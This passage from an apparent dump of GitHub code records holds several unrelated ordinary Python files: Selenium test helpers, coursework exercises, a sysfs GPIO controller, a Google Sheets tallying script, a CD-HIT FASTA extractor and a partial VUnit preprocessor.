self.click(self.pre_screening)\n time.sleep(2)\n self.click(self.fund_manager)\n time.sleep(5)\n\n def private_manager_details(self):\n \"\"\"头部\"\"\"\n self.type(self.key_word, '赵军')\n time.sleep(3)\n self.click(self.sure)\n time.sleep(8)\n self.click(self.details)\n time.sleep(5)\n\n def private_manager_profit(self):\n \"\"\"累计收益率\"\"\"\n self.click(self.y1_manager)\n time.sleep(5)\n\n def private_manager_rank(self):\n \"\"\"同类排名\"\"\"\n self.click(self.y1_rank)\n time.sleep(5)\n\n def private_manager_risk(self):\n \"\"\"收益风险比\"\"\"\n self.click(self.y1_risk)\n time.sleep(8)\n self.click(self.super_yield)\n time.sleep(8)\n self.click(self.bate_coefficient)\n time.sleep(8)\n\n def private_manager_list(self):\n \"\"\"产品列表\"\"\"\n self.click(self.up_list)\n time.sleep(5)\n self.click(self.fund_link)\n time.sleep(5)\n\n def private_manager_info(self):\n \"\"\"基本信息\"\"\"\n self.click(self.mechanism_link)\n time.sleep(5)\n\n","repo_name":"Testwjm/test_fram","sub_path":"pageobjects/private_manager.py","file_name":"private_manager.py","file_ext":"py","file_size_in_byte":2747,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"75100066083","text":"#!/usr/bin/env python3\n\"\"\"\ntask_wait_n: an async routine called task_wait_n that takes in\n 2 int arguments (in this order): n and max_delay.\n It will spawn task_wait_random n times with the\n specified max_delay.\n\"\"\"\n\n\nimport asyncio\nfrom typing import List\nimport random\ntask_wait_random = __import__('3-tasks').task_wait_random\n\n\nasync def task_wait_n(n: int, max_delay: int = 10) -> List[float]:\n \"\"\"\n spawns task_wait_random n times and return a list of all delays\n concurrently\n \"\"\"\n\n tasks = []\n tasks = [task_wait_random(max_delay) for i in range(n)]\n\n delays = []\n\n while len(tasks):\n done, tasks = await asyncio.wait(tasks,\n return_when=asyncio.FIRST_COMPLETED)\n for task in done:\n delay = task.result()\n delays.append(delay)\n return delays\n","repo_name":"JeremyWarui/alx-backend-python","sub_path":"0x01-python_async_function/4-tasks.py","file_name":"4-tasks.py","file_ext":"py","file_size_in_byte":885,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"306389509","text":"# mydate.py\n# Author: Kevin Tran\n# Course: Data Management w/ Prof. Versoza\n\nimport random\n\n\ndef is_valid_month_num(n):\n#params: n = integer 1-12 representing month\n#return: boolean, True if n is between 1-12\n\n try:\n validParam = int(n)\n if ((validParam >= 1) and (validParam <= 12)):\n return True\n else:\n return False\n\n except TypeError:\n print(\"Invalid parameter.\")\n\n\ndef month_num_to_string(month_num):\n#params: integer 1-12 representing month\n#return: month name as string\n\n if (is_valid_month_num(month_num) == False):\n return None\n\n else:\n months = [\"January\", \"February\", \"March\", \"April\", \"May\", \"June\", \"July\", \"August\", \"September\", \"October\", \"November\", \"December\"]\n\n return months[month_num - 1]\n\n\n\ndef date_to_string(date_list):\n#params: 3 element list [year, month, day]\n#return: string version of date_list\n\n day = str(date_list[2])\n month = month_num_to_string(date_list[1])\n year = date_list[0]\n\n return (\"{0} {1}, {2}\".format(month, day, year))\n\n\ndef dates_to_strings(list_of_date_lists):\n#params: [[year, month, day], [year, month, day], ...]\n#return: [['January 1, 2000'], ...]\n\n\n return list(map(date_to_string, list_of_date_lists))\n\n\ndef remove_years(list_of_date_lists):\n#params: [[year, month, day], [year, month, day], ...]\n#return: [[month, day], [month, day]]\n for date in list_of_date_lists:\n del date[0]\n\n return list_of_date_lists\n\n\ndef is_leap_year(year):\n#params: int year\n#return: boolean, True if leap year\n if (year % 4 == 0):\n if (year % 100 == 0):\n if (year % 400 == 0):\n return True\n else:\n return False\n else:\n return True\n else:\n return False\n\n\n\ndef get_num_days_in_month(month_num, year):\n#params: int month, int year\n#return: int number of days for the month, factoring in leap years\n\n days_in_months = [31, 28, 31, 30, 31, 30, 31, 31, 30, 31, 30, 31]\n\n if (is_valid_month_num(month_num)):\n\n if (is_leap_year(year)):\n february_days = days_in_months[1] + 1\n if (month_num == 2):\n return february_days\n\n return days_in_months[month_num - 1]\n\n else:\n return days_in_months[month_num - 1]\n\n\n\ndef generate_date(start_year, end_year):\n#params: int year, int max year\n#return: randomized date [year, month num, day]\n\n year = random.randint(start_year, end_year)\n month = random.randint(1, 12)\n day = random.randint(1, get_num_days_in_month(month,year))\n\n\n if(is_leap_year(year)):\n if(month == 2):\n day = random.randint(1, 29)\n\n\n return [year, month, day]\n\n\ndef duplicate(list_birthdays): #extra function\n#params: list of birthdays\n#return: list of duplicate birthdays, unique values only\n array = []\n dupes = []\n for i in range(len(list_birthdays)):\n if (list_birthdays[i] not in array):\n array.append(list_birthdays[i])\n elif (list_birthdays[i] not in dupes): #prevent repeats\n dupes.append(list_birthdays[i])\n\n\n return(dupes)\n","repo_name":"tranvk/DBManagement","sub_path":"Pronouns_Birthdays/mydate.py","file_name":"mydate.py","file_ext":"py","file_size_in_byte":3127,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"29245011565","text":"# -*- coding: utf-8 -*-\n# @Author: Kajol.Patira\n# @Date: 2021-01-04 19:07:33\n# @Last Modified by: Kajol.Patira\n# @Last Modified time: 2021-01-04 19:47:07\n# @Title: Accepts a sequence of numbers from user and generate a list and a tuple with those numbers.\n\n# function to generate list and tuple\ndef list_tuple():\n values = input(\"Enter some comma seperated values: \")\n lists = values.split(\",\")\n tuples = tuple(lists)\n print(\"List: \", lists)\n print(\"Tuple: \", tuples)\n\nlist_tuple()","repo_name":"Kajol7052/Week2_Data-Structures_Fellowship","sub_path":"Basic_Python/list_and_tuple.py","file_name":"list_and_tuple.py","file_ext":"py","file_size_in_byte":500,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"18604883166","text":"__all__ = ('DIRECTIONS', 'INPUT', 'OUTPUT',\n 'EDGES', 'RISING', 'FALLING', 'BOTH',\n 'Controller')\n\nimport errno\nimport os\nimport select\n\nfrom twisted.internet import reactor\n\nimport logging\n\nLogger = logging.getLogger('sysfs.gpio')\nLogger.addHandler(logging.StreamHandler())\nLogger.setLevel(logging.DEBUG)\n\n# Sysfs constants\n\nSYSFS_BASE_PATH = '/sys/class/gpio'\n\nSYSFS_EXPORT_PATH = SYSFS_BASE_PATH + '/export'\nSYSFS_UNEXPORT_PATH = SYSFS_BASE_PATH + '/unexport'\n\nSYSFS_GPIO_PATH = SYSFS_BASE_PATH + '/gpio%d'\nSYSFS_GPIO_DIRECTION_PATH = SYSFS_GPIO_PATH + '/direction'\nSYSFS_GPIO_EDGE_PATH = SYSFS_GPIO_PATH + '/edge'\nSYSFS_GPIO_VALUE_PATH = SYSFS_GPIO_PATH + '/value'\nSYSFS_GPIO_ACTIVE_LOW_PATH = SYSFS_GPIO_PATH + '/active_low'\n\nSYSFS_GPIO_VALUE_LOW = '0'\nSYSFS_GPIO_VALUE_HIGH = '1'\n\nEPOLL_TIMEOUT = 1 # second\n\n# Public interface\n\nINPUT = 'in'\nOUTPUT = 'out'\n\nRISING = 'rising'\nFALLING = 'falling'\nBOTH = 'both'\n\nACTIVE_LOW_ON = 1\nACTIVE_LOW_OFF = 0\n\nDIRECTIONS = (INPUT, OUTPUT)\nEDGES = (RISING, FALLING, BOTH)\nACTIVE_LOW_MODES = (ACTIVE_LOW_ON, ACTIVE_LOW_OFF)\n\n\nclass Pin(object):\n \"\"\"\n Represent a pin in SysFS\n \"\"\"\n\n def __init__(self, number, direction, callback=None, edge=None, active_low=0):\n \"\"\"\n @type number: int\n @param number: The pin number\n @type direction: int\n @param direction: Pin direction, enumerated by C{Direction}\n @type callback: callable\n @param callback: Method be called when pin changes state\n @type edge: int\n @param edge: The edge transition that triggers callback,\n enumerated by C{Edge}\n @type active_low: int\n @param active_low: Indicator of whether this pin uses inverted\n logic for HIGH-LOW transitions.\n \"\"\"\n self._number = number\n self._direction = direction\n self._callback = callback\n self._active_low = active_low\n\n self._fd = open(self._sysfs_gpio_value_path(), 'r+')\n\n if callback and not edge:\n raise Exception('You must supply a edge to trigger callback on')\n\n with open(self._sysfs_gpio_direction_path(), 'w') as fsdir:\n fsdir.write(direction)\n\n if edge:\n with open(self._sysfs_gpio_edge_path(), 'w') as fsedge:\n fsedge.write(edge)\n\n if active_low:\n if active_low not in ACTIVE_LOW_MODES:\n raise Exception('You must supply a value for active_low which is either 0 or 1.')\n with open(self._sysfs_gpio_active_low_path(), 'w') as fsactive_low:\n fsactive_low.write(str(active_low))\n\n @property\n def callback(self):\n \"\"\"\n Gets this pin callback\n \"\"\"\n return self._callback\n\n @callback.setter\n def callback(self, value):\n \"\"\"\n Sets this pin callback\n \"\"\"\n self._callback = value\n\n @property\n def direction(self):\n \"\"\"\n Pin direction\n \"\"\"\n return self._direction\n\n @property\n def number(self):\n \"\"\"\n Pin number\n \"\"\"\n return self._number\n\n @property\n def active_low(self):\n \"\"\"\n Pin number\n \"\"\"\n return self._active_low\n\n def set(self):\n \"\"\"\n Set pin to HIGH logic setLevel\n \"\"\"\n self._fd.write(SYSFS_GPIO_VALUE_HIGH)\n self._fd.seek(0)\n\n def reset(self):\n \"\"\"\n Set pin to LOW logic setLevel\n \"\"\"\n self._fd.write(SYSFS_GPIO_VALUE_LOW)\n self._fd.seek(0)\n\n def read(self):\n \"\"\"\n Read pin value\n\n @rtype: int\n @return: I{0} when LOW, I{1} when HIGH\n \"\"\"\n val = self._fd.read()\n self._fd.seek(0)\n return int(val)\n\n def fileno(self):\n \"\"\"\n Get the file descriptor associated with this pin.\n\n @rtype: int\n @return: File descriptor\n \"\"\"\n return self._fd.fileno()\n\n def changed(self, state):\n if callable(self._callback):\n self._callback(self.number, state)\n\n def _sysfs_gpio_value_path(self):\n \"\"\"\n Get the file that represent the value of this pin.\n\n @rtype: str\n @return: the path to sysfs value file\n \"\"\"\n return SYSFS_GPIO_VALUE_PATH % self.number\n\n def _sysfs_gpio_direction_path(self):\n \"\"\"\n Get the file that represent the direction of this pin.\n\n @rtype: str\n @return: the path to sysfs direction file\n \"\"\"\n return SYSFS_GPIO_DIRECTION_PATH % self.number\n\n def _sysfs_gpio_edge_path(self):\n \"\"\"\n Get the file that represent the edge that will trigger an interrupt.\n\n @rtype: str\n @return: the path to sysfs edge file\n \"\"\"\n return SYSFS_GPIO_EDGE_PATH % self.number\n\n def _sysfs_gpio_active_low_path(self):\n \"\"\"\n Get the file that represents the active_low setting for this pin.\n\n @rtype: str\n @return: the path to sysfs active_low file\n \"\"\"\n return SYSFS_GPIO_ACTIVE_LOW_PATH % self.number\n\n\nclass Controller(object):\n '''\n A singleton class to provide access to SysFS GPIO pins\n '''\n\n def __new__(cls, *args, **kw):\n if not hasattr(cls, '_instance'):\n instance = super(Controller, cls).__new__(cls)\n instance._allocated_pins = {}\n instance._poll_queue = select.epoll()\n\n instance._available_pins = []\n instance._running = True\n\n # Cleanup before stopping reactor\n reactor.addSystemEventTrigger('before', 'shutdown', instance.stop)\n\n # Run the EPoll in a Thread, as it blocks.\n reactor.callInThread(instance._poll_queue_loop)\n\n cls._instance = instance\n return cls._instance\n\n def __init__(self):\n pass\n\n def _poll_queue_loop(self):\n\n while self._running:\n try:\n events = self._poll_queue.poll(EPOLL_TIMEOUT)\n except IOError as error:\n if error.errno != errno.EINTR:\n Logger.error(repr(error))\n reactor.stop()\n if len(events) > 0:\n reactor.callFromThread(self._poll_queue_event, events)\n\n @property\n def available_pins(self):\n return self._available_pins\n\n @available_pins.setter\n def available_pins(self, value):\n self._available_pins = value\n\n def stop(self):\n self._running = False\n\n try:\n values = self._allocated_pins.copy().itervalues()\n except AttributeError:\n values = self._allocated_pins.copy().values()\n for pin in values:\n self.dealloc_pin(pin.number)\n\n def alloc_pin(self, number, direction, callback=None, edge=None, active_low=0):\n\n Logger.debug('SysfsGPIO: alloc_pin(%d, %s, %s, %s, %s)'\n % (number, direction, callback, edge, active_low))\n\n self._check_pin_validity(number)\n\n if direction not in DIRECTIONS:\n raise Exception(\"Pin direction %s not in %s\"\n % (direction, DIRECTIONS))\n\n if callback and edge not in EDGES:\n raise Exception(\"Pin edge %s not in %s\" % (edge, EDGES))\n\n if not self._check_pin_already_exported(number):\n with open(SYSFS_EXPORT_PATH, 'w') as export:\n export.write('%d' % number)\n else:\n Logger.debug(\"SysfsGPIO: Pin %d already exported\" % number)\n\n pin = Pin(number, direction, callback, edge, active_low)\n\n if direction is INPUT:\n self._poll_queue_register_pin(pin)\n\n self._allocated_pins[number] = pin\n return pin\n\n def _poll_queue_register_pin(self, pin):\n ''' Pin responds to fileno(), so it's pollable. '''\n self._poll_queue.register(pin, (select.EPOLLPRI | select.EPOLLET))\n\n def _poll_queue_unregister_pin(self, pin):\n self._poll_queue.unregister(pin)\n\n def dealloc_pin(self, number):\n\n Logger.debug('SysfsGPIO: dealloc_pin(%d)' % number)\n\n if number not in self._allocated_pins:\n raise Exception('Pin %d not allocated' % number)\n\n with open(SYSFS_UNEXPORT_PATH, 'w') as unexport:\n unexport.write('%d' % number)\n\n pin = self._allocated_pins[number]\n\n if pin.direction is INPUT:\n self._poll_queue_unregister_pin(pin)\n\n del pin, self._allocated_pins[number]\n\n def get_pin(self, number):\n\n Logger.debug('SysfsGPIO: get_pin(%d)' % number)\n\n return self._allocated_pins[number]\n\n def set_pin(self, number):\n\n Logger.debug('SysfsGPIO: set_pin(%d)' % number)\n\n if number not in self._allocated_pins:\n raise Exception('Pin %d not allocated' % number)\n\n return self._allocated_pins[number].set()\n\n def reset_pin(self, number):\n\n Logger.debug('SysfsGPIO: reset_pin(%d)' % number)\n\n if number not in self._allocated_pins:\n raise Exception('Pin %d not allocated' % number)\n\n return self._allocated_pins[number].reset()\n\n def get_pin_state(self, number):\n\n Logger.debug('SysfsGPIO: get_pin_state(%d)' % number)\n\n if number not in self._allocated_pins:\n raise Exception('Pin %d not allocated' % number)\n\n pin = self._allocated_pins[number]\n\n if pin.direction == INPUT:\n self._poll_queue_unregister_pin(pin)\n\n val = pin.read()\n\n if pin.direction == INPUT:\n self._poll_queue_register_pin(pin)\n\n if val <= 0:\n return False\n else:\n return True\n\n ''' Private Methods '''\n\n def _poll_queue_event(self, events):\n \"\"\"\n EPoll event callback\n \"\"\"\n\n for fd, event in events:\n if not (event & (select.EPOLLPRI | select.EPOLLET)):\n continue\n\n try:\n values = self._allocated_pins.itervalues()\n except AttributeError:\n values = self._allocated_pins.values()\n for pin in values:\n if pin.fileno() == fd:\n pin.changed(pin.read())\n\n def _check_pin_already_exported(self, number):\n \"\"\"\n Check if this pin was already exported on sysfs.\n\n @type number: int\n @param number: Pin number\n @rtype: bool\n @return: C{True} when it's already exported, otherwise C{False}\n \"\"\"\n gpio_path = SYSFS_GPIO_PATH % number\n return os.path.isdir(gpio_path)\n\n def _check_pin_validity(self, number):\n \"\"\"\n Check if pin number exists on this bus\n\n @type number: int\n @param number: Pin number\n @rtype: bool\n @return: C{True} when valid, otherwise C{False}\n \"\"\"\n\n if number not in self._available_pins:\n raise Exception(\"Pin number out of range\")\n\n if number in self._allocated_pins:\n raise Exception(\"Pin already allocated\")\n\n# Create controller instance\nController = Controller()\n\n\nif __name__ == '__main__':\n print(\"This module isn't intended to be run directly.\")\n","repo_name":"derekstavis/python-sysfs-gpio","sub_path":"sysfs/gpio.py","file_name":"gpio.py","file_ext":"py","file_size_in_byte":11193,"program_lang":"python","lang":"en","doc_type":"code","stars":52,"dataset":"github-code","pt":"52"} +{"seq_id":"22856124381","text":"from __future__ import print_function\nimport pickle\nimport os.path\nfrom googleapiclient.discovery import build\nfrom google_auth_oauthlib.flow import InstalledAppFlow\nfrom google.auth.transport.requests import Request\nfrom collections import Counter\n\n# If modifying these scopes, delete the file token.pickle.\nSCOPES = ['https://www.googleapis.com/auth/spreadsheets']\n\n# The ID and range of a sample spreadsheet.\nINPUT_SHEET = '1ImcBQOQ86xwyA_SFtI6H9Vq3szkoUWgdtjHv7wuvBL8'\nSAMPLE_RANGE_NAME = 'input!A2:E'\nMAX_PALLETS = 15\n\ndef main():\n \"\"\"Shows basic usage of the Sheets API.\n Prints values from a sample spreadsheet.\n \"\"\"\n creds = None\n # The file token.pickle stores the user's access and refresh tokens, and is\n # created automatically when the authorization flow completes for the first\n # time.\n if os.path.exists('token.pickle'):\n with open('token.pickle', 'rb') as token:\n creds = pickle.load(token)\n # If there are no (valid) credentials available, let the user log in.\n if not creds or not creds.valid:\n if creds and creds.expired and creds.refresh_token:\n creds.refresh(Request())\n else:\n flow = InstalledAppFlow.from_client_secrets_file(\n 'credentials.json', SCOPES)\n creds = flow.run_local_server()\n # Save the credentials for the next run\n with open('token.pickle', 'wb') as token:\n pickle.dump(creds, token)\n\n service = build('sheets', 'v4', credentials=creds)\n\n # Call the Sheets API\n sheet = service.spreadsheets()\n result = sheet.values().get(spreadsheetId=INPUT_SHEET\n,\n range=SAMPLE_RANGE_NAME).execute()\n values = result.get('values', [])\n\n if not values:\n print('No data found.')\n else:\n # print('weight, quantity:')\n # for row in values:\n # # Print columns A and E, which correspond to indices 0 and 4.\n # print('%s, %s' % (row[0], row[1]))\n pallet_weights = [Counter() for _ in range(MAX_PALLETS)]\n pallet_counts = [Counter() for _ in range(MAX_PALLETS)]\n for row in values:\n weight = int(row[0])\n quantity = int(row[1])\n description = row[2].lower()\n source = row[3]\n pallet_num = int(row[4])\n total_weights_per_pallet = pallet_weights[pallet_num-1]\n total_counts_per_pallet = pallet_counts[pallet_num-1]\n if source == \"Berkeley\" or source == \"berkeley\":\n total_weights_per_pallet[description] += weight\n total_counts_per_pallet[description] += quantity\n counter = 0\n for c in zip(pallet_weights, pallet_counts):\n # print('weight %s, count %s', c)\n values = [\n generate_row(c)\n ]\n body = {\n 'values': values\n }\n range_name = 'BerkXfer!B' + str(counter + 5)\n counter += 1\n result = service.spreadsheets().values().update(\n spreadsheetId=INPUT_SHEET, range=range_name,\n valueInputOption='RAW',body=body).execute()\n\nRELEVANT_FIELDS = ['crt', 'lcd', 'uwed', 'unstackable uwed']\ndef generate_row(zipped_weight_and_counts):\n weights = zipped_weight_and_counts[0]\n counts = zipped_weight_and_counts[1]\n row = []\n for field in RELEVANT_FIELDS:\n weight = weights[field]\n count = counts[field]\n if field == 'uwed':\n weight += weights['lcd']\n count += counts['lcd']\n pair = [weight, count] if field in weights else [0, 0]\n row.extend(pair)\n print(row)\n return row\n\nif __name__ == '__main__':\n main()","repo_name":"Jessegao/CTRC-project","sub_path":"basic_sheets.py","file_name":"basic_sheets.py","file_ext":"py","file_size_in_byte":3722,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"38794099994","text":"import argparse\n\nfrom lib import *\n\n\n# ----------------------------------------------------------------------------------------\ndef main(args):\n\treference_list_path = args.reference_list[0]\n\tsequence_file_path = args.sequence_file[0]\n\tcluster_file_path = args.cluster_file[0]\n\n\tprint(\"\\nGenerating CD-HIT cluster FASTA files...\\n\")\n\n\tprint(\"Sequence list file: \" + reference_list_path)\n\tprint(\"Sequence FASTA file: \" + sequence_file_path)\n\tprint(\"CD-Hit cluster file: \" + cluster_file_path + \"\\n\")\n\n\tcheck_file_extensions(reference_list_path, sequence_file_path, cluster_file_path)\n\n\treference_list = get_reference_list(reference_list_path)\n\tfasta_dict = get_fasta_dict(sequence_file_path)\n\tcluster_list = get_cluster_list(cluster_file_path)\n\n\treference_clusters = []\n\tfor cluster in cluster_list:\n\t\tfor reference_accession in reference_list:\n\t\t\tif reference_accession in cluster.cluster_sequences.keys():\n\t\t\t\treference_clusters.append(cluster)\n\t\t\t\tbreak\n\t\t\telse:\n\t\t\t\tcontinue\n\n\tfasta_list = []\n\tfor cluster in reference_clusters:\n\t\tprint(\"Cluster \" + str(cluster.cluster_id) + \" was found to have reference sequences.\")\n\t\tcluster_accessions = cluster.cluster_sequences.keys()\n\t\tcluster_fastas = map(lambda x: fasta_dict[x].format(\"fasta\"), cluster_accessions)\n\t\tcluster_tuple = (cluster.cluster_id, \"\".join(cluster_fastas))\n\t\tfasta_list.append(cluster_tuple)\n\n\tprint(\"\")\n\tfor cluster_id, fasta in fasta_list:\n\t\ttry:\n\t\t\toutfile = \"Cluster\" + str(cluster_id) + \".faa\"\n\t\t\tprint(\"Writing \" + outfile)\n\t\t\twith open(outfile, \"w\") as new_file:\n\t\t\t\tnew_file.write(fasta)\n\t\t\t\tnew_file.close()\n\t\texcept IOError as e:\n\t\t\tprint(str(e))\n\t\t\tsys.exit(1) # Aborts program. (exit(1) indicates that an error occurred)\n\n\tprint(\"\\nAll reference clusters written!\")\n\n\n# ----------------------------------------------------------------------------------------\nif __name__ == '__main__':\n\tdescriptor = \"\"\"\n\tExtracts CD-Hit clusters which contain reference proteins and stores them in FASTA format.\n\t\"\"\"\n\n\tparser = argparse.ArgumentParser(description=descriptor)\n\n\tparser.add_argument('-i', '--cluster_file', metavar='CLUSTER', nargs=1, help='''\n\tCD-Hit cluster file which provides clustering information.''')\n\n\tparser.add_argument('-s', '--sequence_file', metavar='FASTA', nargs=1, help='''\n\tFASTA file which provides sequences to be extracted.''')\n\n\tparser.add_argument('-r', '--reference_list', metavar='LIST', nargs=1, help='''\n\tFile of sequence identifiers (one per line) who's CD-HIT clusters should turned into FASTA files.''')\n\n\tcli_args = parser.parse_args()\n\n\t# At minimum we require a query, query DB and subject DB to proceed.\n\tproceed = True\n\n\tif cli_args.reference_list is None:\n\t\tprint(\"Error: Missing sequence list path...\")\n\t\tproceed = False\n\n\tif cli_args.sequence_file is None:\n\t\tprint(\"Error: Missing sequence FASTA file path...\")\n\t\tproceed = False\n\n\tif cli_args.cluster_file is None:\n\t\tprint(\"Error: Missing query BLAST database path...\")\n\t\tproceed = False\n\n\tif proceed:\n\t\tmain(cli_args)\n\telse:\n\t\tprint(\"\")\n\t\tparser.print_help()\n\t\tprint(\"\")\n","repo_name":"LeeBergstrand/CDHITtoFASTA","sub_path":"__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":3040,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"1817163447","text":"# python3\n\nimport sys\nclass Database:\n def __init__(self, row_counts):\n self.row_counts = row_counts\n self.max_row_count = max(row_counts)\n n_tables = len(row_counts)\n self.ranks = [1] * n_tables\n self.parents = list(range(n_tables))\n\n def merge(self, src, dst):\n src_parent = self.get_parent(src)\n dst_parent = self.get_parent(dst)\n\n src_parent_rank = self.ranks[src_parent]\n dst_parent_rank = self.ranks[dst_parent]\n\n if src_parent == dst_parent:\n return\n # merge two components\n # use union by rank heuristic\n # update max_row_count with the new maximum table size\n\n if dst_parent_rank > src_parent_rank:\n self.parents[src_parent] = dst_parent\n self.row_counts[dst_parent] += self.row_counts[src_parent]\n self.row_counts[src_parent] = 0\n self.max_row_count = max(self.max_row_count, self.row_counts[dst_parent])\n # keep in mind when finding the max - compare the stored max and the value computed in the row_counts list\n # of source/destination index\n else:\n self.parents[dst_parent] = src_parent\n self.row_counts[src_parent] += self.row_counts[dst_parent]\n self.row_counts[dst_parent] = 0\n self.max_row_count = max(self.max_row_count, self.row_counts[src_parent])\n if dst_parent_rank == dst_parent_rank:\n self.ranks[src_parent] += 1\n return\n\n def get_parent(self, table):\n # find parent and compress path\n if self.parents[table] != table:\n ## compress the path by updating the parents in the tree\n self.parents[table] = self.get_parent(self.parents[table])\n\n return self.parents[table]\n\n\ndef main():\n n_tables, n_queries = map(int, sys.stdin.readline().split())\n counts = list(map(int, sys.stdin.readline().split()))\n #assert len(counts) == n_tables\n db = Database(counts)\n for i in range(n_queries):\n #if i % 100 == 0:\n # print(\"processing for - \", i)\n dst, src = map(int, sys.stdin.readline().split())\n db.merge(dst - 1, src - 1)\n print(db.max_row_count)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"patell11/DataStructuresAndAlgorithms_SanDiego","sub_path":"Algorithmic Toolbox1/Data Structures/week2_Priority_Queue/Merging Tables/merging_tables.py","file_name":"merging_tables.py","file_ext":"py","file_size_in_byte":2266,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"36938978983","text":"from django.urls import reverse\nfrom selenium.webdriver.common.by import By\n\nfrom test.factories import ArticleFactory\n\nfrom test.selenium_setup import SeleniumWithFirefox\n\n\nclass TestArticlesPage(SeleniumWithFirefox):\n def test_articles_page(self):\n ArticleFactory.create_batch(2)\n\n url = reverse(\"articles\")\n self.selenium.get(self.live_server_url + url)\n articles = self.selenium.find_elements(By.CLASS_NAME, \"card\")\n\n self.assertEqual(len(articles), 2)\n\n\nclass TestArticleDetailsPage(SeleniumWithFirefox):\n def test_article_details_page(self):\n article = ArticleFactory.create(body=\"test body\")\n\n url = reverse(\"article_detail\", args=[article.id])\n self.selenium.get(self.live_server_url + url)\n\n article_body = self.selenium.find_element(\n By.XPATH, \"//*[contains(text(), 'test body')]\"\n )\n self.assertEqual(article_body.tag_name, \"p\")\n","repo_name":"Gvard-Windlass/teahouse","sub_path":"articles/test/test_pages.py","file_name":"test_pages.py","file_ext":"py","file_size_in_byte":935,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"26625890287","text":"import re\nfrom vunit.ui.preprocessor import Preprocessor\n\n\nclass CheckPreprocessor(Preprocessor):\n \"\"\"\n Preprocessing of check functions adding helpful message to check_relation calls.\n \"\"\"\n\n def __init__(self, order=2000):\n super().__init__(order)\n self._find_operators = re.compile(r\"\\?/=|\\?<=|\\?>=|\\?<|\\?>|\\?=|/=|<=|>=|<|>|=\", re.MULTILINE)\n self._find_quotes = re.compile(r'\"|' + r\"'\", re.MULTILINE)\n self._find_comments = re.compile(r\"--|/\\*|\\*/\", re.MULTILINE)\n self._actual_formal = re.compile(r\"=>(?P.*)\", re.MULTILINE)\n self._leading_paranthesis = re.compile(r\"[\\s(]*\")\n self._trailing_paranthesis = re.compile(r\"[\\s)]*\")\n\n def run(self, code, file_name): # pylint: disable=unused-argument\n check_relation_pattern = re.compile(r\"[^a-zA-Z0-9_](?Pcheck_relation)\\s*(?P\\()\", re.MULTILINE)\n\n check_relation_calls = list(check_relation_pattern.finditer(code))\n check_relation_calls.reverse()\n\n for match in check_relation_calls:\n (\n relation,\n offset_to_point_before_closing_paranthesis,\n ) = self._extract_relation(code, match)\n if relation:\n context_msg_parameter = f\", context_msg => {relation.make_context_msg()!s}\"\n code = (\n code[: match.end(\"parameters\") + offset_to_point_before_closing_paranthesis]\n + context_msg_parameter\n + code[match.end(\"parameters\") + offset_to_point_before_closing_paranthesis :]\n )\n\n return code\n\n def _extract_relation(self, code, check):\n # pylint: disable=missing-docstring\n def end_of_parameter(token):\n return token.value == \",\" if token.level == 1 else token.level == 0\n\n parameter_tokens = []\n index = 1\n relation = None\n for token in self._classify_tokens(code[check.start(\"parameters\") + 1 :]):\n add_token = True\n if token.type == Token.NORMAL:\n # The first found parameter containing a top-level relation is assumed\n # to be the expr parameter. This is a very reasonable assumption since\n # the return types of normal relational operators are boolean, std_ulogic,\n # or bit. The expr parameter is the only input of these types.\n if not relation:\n if end_of_parameter(token):\n relation = self._get_relation_from_parameter(parameter_tokens)\n parameter_tokens = []\n add_token = False\n\n if token.level == 0:\n break\n elif token.is_comment:\n add_token = False\n\n if add_token:\n parameter_tokens.append(token)\n\n index += 1\n\n if not relation:\n raise SyntaxError(\n f\"Failed to find relation in {(code[check.start('call') : check.end('parameters') + index])!s}\"\n )\n\n return relation, index - 1\n\n @staticmethod\n def _classify_tokens(code):\n # pylint: disable=missing-docstring\n # pylint: disable=too-many-branches\n def even_quotes(code):\n n_quotes = 0\n for index in range(0, len(code), 2):\n if code[index] != \"'\":\n break\n n_quotes += 1\n\n return (n_quotes % 2) == 0\n\n code_section = Token.NORMAL\n level = 1\n index = 0\n for char in code:\n token = Token(char)\n if code_section == Token.NORMAL:\n if char == '\"':\n code_section = Token.STRING\n elif char == \"'\":\n # Used to avoid mixing up qualified expressions and\n # character literals, e.g. std_logic'('1').\n if even_quotes(code[index:]):\n code_section = Token.CHARACTER_LITERAL\n elif code[index : index + 2] == \"--\":\n code_section = Token.LINE_COMMENT\n elif code[index : index + 2] == \"/*\":\n code_section = Token.BLOCK_COMMENT\n elif char == \"(\":\n level += 1\n elif char == \")\":\n level -= 1\n\n next_code_section = code_section\n\n elif code_section == Token.STRING:\n if char == '\"':\n next_code_section = Token.NORMAL\n elif code_section == Token.CHARACTER_LITERAL:\n if char == \"'\":\n next_code_section = Token.NORMAL\n elif code_section == Token.LINE_COMMENT:\n if char == \"\\n\":\n next_code_section = Token.NORMAL\n elif code_section == Token.BLOCK_COMMENT:\n if code[index - 1 : index + 1] == \"*/\":\n next_code_section = Token.NORMAL\n\n token.type = code_section\n token.level = level\n index += 1\n\n yield token\n\n code_section = next_code_section\n\n def _get_relation_from_parameter(self, tokens):\n # pylint: disable=missing-docstring\n def find_top_level_match(matches, tokens, top_level=1):\n if matches:\n for match in matches:\n if not tokens[match.start()].is_quote and tokens[match.start()].level == top_level:\n return match\n\n return None\n\n relation = None\n token_string = \"\".join([token.value for token in tokens]).strip()\n actual_formal = find_top_level_match(self._actual_formal.finditer(token_string), tokens)\n if actual_formal:\n expr = actual_formal.group(\"actual\")\n start = actual_formal.start(\"actual\")\n else:\n expr = token_string\n start = 0\n\n # VHDL only allows one relational operator at the top level of an expression.\n # This operator divides the relation between left and right. The token.level\n # is normally one for the top level but may be higher if the expression is\n # enclosed with parenthesis.\n top_level = (\n min(\n [\n self._leading_paranthesis.match(expr).group().count(\"(\"),\n 